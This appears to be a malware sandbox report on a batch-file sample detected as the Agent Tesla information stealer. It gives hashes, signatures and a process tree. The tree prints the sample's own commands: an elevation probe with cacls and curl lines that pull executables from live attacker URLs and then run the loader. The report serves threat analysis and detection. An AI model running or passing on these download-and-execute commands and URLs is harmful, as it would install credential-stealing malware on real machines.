Analysis

max time kernel: 5s
max time network: 15s
platform: windows11-21h2_x64
resource: win11-20231128-en
resource tags: arch:x64, arch:x86, image:win11-20231128-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 03-12-2023 20:26

Static task: static1
Behavioral task: behavioral1
Sample: #πΎπ βπππΌβπ ππ.π.bat
Resource: win11-20231128-en
General

Target: #πΎπ βπππΌβπ ππ.π.bat
Size: 20KB
MD5: a7793c10f4e024c789964be67375ab2a
SHA1: 988d0af9a4ca435dd084ce541a250f6ba57f590a
SHA256: 770eedd081641838d18c615b60ea2658febcb6bb19a35a0fe1c569eeedb8026d
SHA512: 50e2b5c410fc1d865f446214bfc655ca64fcd17bde6e840f89bf4ecd2970203a173fc0d388a18cfd838b61bea397c0c9c851d7c946ec8d4343787162cd772f83
SSDEEP: 384:QNJuPLwF+5InJhMFcJqJ+C7inKvcO3oF57talCp1h2wHdpIhG/8J/D8Au99mmBkn:CJuT48InJhMFcJqJ+C7inKvcO3oF57tO
Malware Config
Signatures

- AgentTesla
  Agent Tesla is a .NET (Visual Basic) remote access tool (RAT) and information stealer.

- AgentTesla payload (1 IoC)
  resource: behavioral1/memory/2980-12-0x0000028B506F0000-0x0000028B50906000-memory.dmp
  yara_rule: family_agenttesla
  The match is on a memory dump of PID 2980 (GV-Loader.exe): the Agent Tesla payload was identified in the loader's process memory at runtime, not in the downloaded file on disk. The dumped region spans 0x216000 bytes (about 2.1MB).

- Downloads MZ/PE file

- Executes dropped EXE (1 IoC)
  pid 2980, process GV-Loader.exe

- Opens file in notepad (likely ransom note) (1 IoC)
  pid 4500, process notepad.exe
  This heuristic fires on any notepad.exe launch from a script, whatever the file. Here the file is HOW_TO_USE.txt, which the same cmd.exe fetched with curl (PID 1752) moments earlier, so it is an instructions file shipped with the loader rather than a note dropped by ransomware; treat the "ransom note" label as a false positive of the heuristic.

- Suspicious use of WriteProcessMemory (12 IoCs)
  The sandbox logs two WriteProcessMemory events for every child spawned by cmd.exe (PID 776), so the 12 entries are 6 parent/child pairs:

  parent pid  parent   target pid  target
  776         cmd.exe  4116        cacls.exe
  776         cmd.exe  4700        curl.exe
  776         cmd.exe  1752        curl.exe
  776         cmd.exe  4844        curl.exe
  776         cmd.exe  4500        notepad.exe
  776         cmd.exe  2980        GV-Loader.exe
Processes

- C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\#πΎπ βπππΌβπ ππ.π.bat" (PID 776)
  Suspicious use of WriteProcessMemory
  - "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system" (PID 4116)
    Running cacls against the SYSTEM registry hive is the stock batch-file test for elevation: the call fails with access denied unless the process is elevated, and scripts branch on its exit code. The report shows only that the probe ran, not how the script reacted to the result.
  - curl -s -o C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe https://notfishvr.dev/cdn/GV-Loader.exe (PID 4700)
  - curl -s -o C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt https://cdn.discordapp.com/attachments/1171187025349709937/1176654675664191598/HOW_TO_USE.txt (PID 1752)
  - curl -s -o C:\Users\Admin\AppData\Roaming\a.exe https://cdn.discordapp.com/attachments/1172213687210225774/1179899267909951589/a.exe (PID 4844)
  - notepad.exe C:\Users\Admin\AppData\Local\Temp\HOW_TO_USE.txt (PID 4500)
    Opens file in notepad (likely ransom note)
  - C:\Users\Admin\AppData\Local\Temp\GV-Loader.exe (PID 2980)
    Executes dropped EXE

All three downloads use the curl.exe built into Windows, write into user-writable directories (AppData\Local\Temp and AppData\Roaming), and the script runs GV-Loader.exe straight afterwards from the same cmd.exe. a.exe is fetched to AppData\Roaming but is never executed within the 5s kernel time of this run, so its behaviour is not covered by this report.
Network
MITRE ATT&CK Matrix
Downloads

Four entries are listed; the first two carry identical hashes, so the same 1.6MB file was retrieved twice. The report does not map entries to the three curl URLs above.

- Filesize: 1.6MB
  MD5: 7954b6812ec1eefe82b89dea0c1c8001
  SHA1: db444d74258448e24d7aa1a26d71cea4c7fe492b
  SHA256: 42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
  SHA512: bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

- Filesize: 1.6MB (identical hashes to the entry above)
  MD5: 7954b6812ec1eefe82b89dea0c1c8001
  SHA1: db444d74258448e24d7aa1a26d71cea4c7fe492b
  SHA256: 42810782549362049cba43c2000566a69575f31fb7d185453f3177412dbac231
  SHA512: bdef3acef40c500f2fd7aa457f6c9f165d25e27a764b2d2ec96ec6e3c49bcb39eae061746b71f51b66c49de96bdac6ad07f04c8c1a015fe1e2a81579b6cb4ca5

- Filesize: 555B
  MD5: 1c01acde55c409853a8bb588c523e810
  SHA1: f4be783a9aaec4a89e3631b4e843fcc7d44bfdda
  SHA256: a851dc4829abc9a3dc25f7f2959de008a151f11c934635f09e16926b73625872
  SHA512: 700bd27279429849f8392de2f0c36c842fed1b12baa5bf8b15e4d56116d44a0161f8a11d4e4a97af81c3ad09c1e842e5e26ff26252b8d4ff59a90f506f001372

- Filesize: 227B
  MD5: 25421ac6c89c87e6b09f2ca856a6c9d3
  SHA1: 2256c3f1078b0772e8e5aa09b6b97788c906da41
  SHA256: 05e5eada548b1af4ef497f1f77f2fcaac19a4349aeab85882009db5552345876
  SHA512: ccf7aa0ad47ee19fa0dcc7a7d2493be8dde47b9af41bb6486c23d2c7fbaf6299971d6df7fc96282cbccbe711c77f7305bc37446be386938108b1e96e0cc2cbc5